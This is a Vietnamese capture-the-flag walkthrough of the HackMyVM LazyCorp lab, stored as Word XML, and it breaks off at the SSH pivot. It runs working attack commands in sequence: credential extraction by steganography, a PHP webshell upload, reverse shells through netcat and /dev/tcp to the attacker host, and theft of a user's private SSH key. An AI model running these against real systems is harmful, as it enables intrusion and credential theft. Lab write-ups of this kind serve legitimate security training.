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8464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HackMyVM — LazyCorp (lazzycorp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC4EB10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Thông tin bài lab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5881"/>
      </w:tblGrid>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="48D22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8CAB" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009274F5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US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34735D61" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009274F5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Thông tin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="3A9F6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5BF1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Máy Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C67F142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10.0.2.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="1D26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C03A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Máy LazyCorp (Target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B8F225F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10.0.2.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="2F2D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9BF7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44453C74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21/tcp — vsftpd 3.0.5 (anonymous)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="3A2EC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0653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5E19571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22/tcp — OpenSSH 8.2p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="20591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D856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7D4233F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80/tcp — Apache 2.4.41</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="5186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4963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Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22271CC1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/auth-lazycorp-dev/login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="49A73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51B7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User web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D4BA289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dev / (steg từ note.jpg)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="06CB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3AC0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User Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E8F9EC9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arvind (SSH key world-readable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="0AC4E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A4E0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SUID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695C08A7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/home/arvind/reset → chạy /usr/bin/reset_site.sh as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="15A8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A848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5240A939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/usr/bin/reset_site.sh — world-writable (-rwxrwxr-x)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07AA8D23" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Quy ước</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F53814" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>🟦</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Terminal Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: recon, FTP, steg, upload, reverse shell, SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E75323B" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>🟥</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trên Target</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: enum, pivot, privesc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3114C88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Đặt biến:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E3E7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ip=10.0.2.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8DFC2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kali=10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610FE14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03350A2C">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39422A99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1. Câu 1 — Khảo sát hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A690633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lastRenderedPageBreak/>
        <w:t>1.1. Quét cổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1FAB77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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>🟦</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01E55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ip=10.0.2.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC951FD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ping -c 4 $ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B4700" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBFC103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nmap -p- -Pn -T4 --min-rate 5000 $ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C6D3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nmap -p 21,22,80 -sCV -Pn -T4 $ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D71B7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Kết quả mong đợi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B44A1E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21/tcp open  ftp     vsftpd 3.0.5  (Anonymous FTP login allowed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130514A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22/tcp open  ssh     OpenSSH 8.2p1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5575A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80/tcp open  http    Apache httpd 2.4.41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132502F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|_http-title: LazyCorp | Empowering Devs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0A85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|_http-robots.txt: 2 disallowed entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6475B6F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| /cms-admin.php /auth-LazyCorp-dev/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F8FA8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24D3FAF3">
          <v:rect id="_x0000_i1104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFA385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1.2. FTP anonymous + tải note.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121120A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ftp $ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBDD2B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Name: anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948879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Password: (Enter hoặc bất kỳ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E86D45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Trong FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258E078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ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C440D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cd pub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F7DCF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ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE56C77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lastRenderedPageBreak/>
        <w:t>binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7EDE8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get note.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442CD8C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bye</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07865445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Hoặc một lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475B9117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wget ftp://anonymous@$ip/pub/note.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9F7C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hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B03274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-o note.jpg ftp://anonymous@$ip/pub/note.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307433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file note.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AA35BA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734F0243">
          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DBE281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1.3. Steganography — lấy credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D6913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Cài stegseek nếu chưa có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604BB4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apt install stegseek   hoặc download binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9116D7" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2608C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stegseek note.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A950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Passphrase rỗng "" → extract creds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A30661" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E3887DD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note.jpg.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0EDD7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Kết quả dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971590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Username: dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71283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Password: d3v........</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C201174" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Password đầy đủ lấy từ output stegseek trên máy bạn.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A82A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3916A7D8">
          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36842AA6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1.4. Web enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0764E93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lastRenderedPageBreak/>
        <w:t>curl -s http://$ip/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552A9D5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Disallow: /cms-admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A3097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Disallow: /auth-LazyCorp-dev/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C36CD06" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D64338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Case-sensitive: dùng lowercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A6FE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-I http://$ip/auth-lazycorp-dev/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944D0C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-I http://$ip/auth-lazycorp-dev/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700A61E5" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595A74D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Fuzz thêm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41569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ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.html -fc 404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA49E3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hoặc feroxbuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6555EA5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feroxbuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0CB17A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Phát hiện quan trọng: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3443"/>
      </w:tblGrid>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="0758D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57EE" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009274F5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US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49731A9" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009274F5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ý nghĩa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="5D5AF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508A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/blog/, /blog/blog.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E14C1C8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DevLog + HTML comment hint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="01CB5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633E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/auth-lazycorp-dev/login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5026F67F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Portal login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="6146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2FAF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/auth-lazycorp-dev/uploads/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074E48A9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Thư mục upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009274F5" w:rsidRPr="009274F5" w14:paraId="47C7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584D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/uploads/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A075EA9" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009274F5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4307EB0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Xem blog + source comment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D06E5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http://$ip/blog/blog.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5426EB8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http://$ip/blog/blog1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426A30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lastRenderedPageBreak/>
        <w:t># Comment gợi ý: note.jpg chứa creds, reset script writable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948856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3531EBB3">
          <v:rect id="_x0000_i1107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E33909F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2. Câu 2 — Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FFE6C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2.1. Login portal + upload webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41106D3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Mở trình duyệt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E39E99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http://10.0.2.14/auth-lazycorp-dev/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC2F1D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Đăng nhập: dev / password từ stegseek.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C4907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 xml:space="preserve">Dashboard có form </w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Upload Site Module"</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — không validate extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7B4B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Tạo webshell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BEDB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echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ABC32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Upload qua form (hoặc curl nếu biết endpoint). Sau upload, shell nằm tại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32697233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http://10.0.2.14/auth-lazycorp-dev/uploads/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124EE4A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Kiểm tra RCE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A5764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"http://$ip/auth-lazycorp-dev/uploads/shell.php?cmd=id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B7B62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uid=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD38B6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572C10E3">
          <v:rect id="_x0000_i1108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1196A4DD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2.2. Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F7498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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>🟦</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali — listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C68E1E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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAF5054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Trigger (Kali hoặc browser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9988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"http://$ip/auth-lazycorp-dev/uploads/shell.php?cmd=busybox%20nc%20${kali}%204444%20-e%20/bin/bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E6AF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hoặc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126A1E03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lastRenderedPageBreak/>
        <w:t>curl -s "http://$ip/auth-lazycorp-dev/uploads/shell.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/${kali}/4444%200%3E%261'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0E06E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Upgrade TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112A722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python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246B080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Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391FF30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stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BAF80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export TERM=xterm-256color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA365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5090ACA8">
          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9406AB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2.3. Enum as www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D09E24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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>🟥</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4FCAF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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032ADB5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/etc/passwd | grep sh$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2DA8D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ls -la /home/arvind/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3333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Quan trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBFF60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-rwsr-xr-x 1 root root ... reset          # SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784D735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drwxr-xr-x ... .ssh                       # world-readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E5E2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-rw-r--r-- ... user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F6CD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strings /home/arvind/reset | grep -E 'reset|/usr'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E558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→ /usr/bin/reset_site.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A51B4C" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1415365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ls -la /usr/bin/reset_site.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD2414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-rwxrwxr-x 1 root arvind ...   ← group-writable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792032C9" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634946F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lastRenderedPageBreak/>
        <w:t>cat /usr/bin/reset_site.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34A55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SSH key của arvind:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B796C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ls -la /home/arvind/.ssh/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920358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/home/arvind/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B2185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593C7ADA">
          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D9AF3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2.4. Pivot sang arvind (SSH key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0E3D16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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>🟦</w:t>
      </w:r>
      <w:r w:rsidRPr="009274F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A428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Copy key từ shell www-data (cat id_rsa) vào file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E7A84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&gt; /tmp/arvind_id_rsa &lt;&lt; 'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522EDD0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-----BEGIN OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE2CC8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(dán toàn bộ key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC708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-----END OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53064BC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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3394FAFD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chmod 600 /tmp/arvind_id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756D8783" w14:textId="77777777" w:rsidR="009274F5" w:rsidRPr="009274F5" w:rsidRDefault="009274F5" w:rsidP="009274F5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
